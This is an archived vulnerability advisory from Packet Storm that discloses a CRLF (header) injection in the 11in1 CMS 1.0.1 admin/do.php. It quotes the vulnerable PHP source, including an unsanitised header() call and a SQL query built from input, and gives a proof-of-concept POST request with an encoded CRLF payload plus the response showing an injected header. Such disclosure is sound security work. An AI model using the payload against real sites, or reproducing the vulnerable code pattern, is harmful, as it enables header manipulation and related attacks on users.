exploit the possibilities

11in1 CMS 1.0.1 CRLF Injection

11in1 CMS 1.0.1 CRLF Injection
Posted Nov 8, 2011
Authored by LiquidWorm | Site zeroscience.mk

11in1 CMS version 1.0.1 suffers from a CRLF injection vulnerability in do.php.

tags | exploit, php
MD5 | e178c83e48311e4cfa9b508301cb4c7c

11in1 CMS 1.0.1 CRLF Injection

Change Mirror Download

11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability


Vendor: 11in1
Product web page: http://www.11in1.org
Affected version: 1.0.1

Summary: Eleven in One is an open-source content management
system (CMS) that is powered by PHP and MySQL. It does not
only help you manage your personal blog but also maintain
your postings at social networks. By establishing consistency
among the data transmitted from and to the blog, this CMS
sustains continuous harmonization of your data over time.

Desc: Input passed to the 'content' parameter in 'do.php' on
line 2112 is not properly sanitised before being returned to
the user. This can be exploited to insert arbitrary HTTP
headers, which are included in a response sent to the user.


==============================================================
/admin/do.php:
--------------------------------------------------------------

2088: // update status
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))
2090: {
2091: $content = htmlspecialchars($_POST['content']);
2092:
2093: // Get database information
2094: $Database = new Database;
2095: $info = $Database->getInfo();
2096:
2097: // connect to database
2098: $conn = mysql_connect($info[0], $info[1], $info[2]);
2099: mysql_select_db($info[3], $conn);
2100:
2101: $date = date("Y-m-d H:i:s");
2102:
2103: // clear table
2104: $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");
2105:
2106: // close connection to db
2107: mysql_close($conn);
2108:
2109: // prepare success message
2110: $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);
2111:
2112: header("Location: msg.php?connect=yes&status=$content");
2113: }

==============================================================


Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
MySQL 5.5.16
PHP 5.3.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab



Advisory ID: ZSL-2011-5055
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php



06.11.2011

------


POST /11in1/admin/do.php?action=postStatus HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection

--

HTTP/1.1 302 Found
Date: Sun, 06 Nov 2011 18:53:29 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: msg.php?connect=yes&status=
ZSL-Custom-Header: love_injection
Content-Length: 1716
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close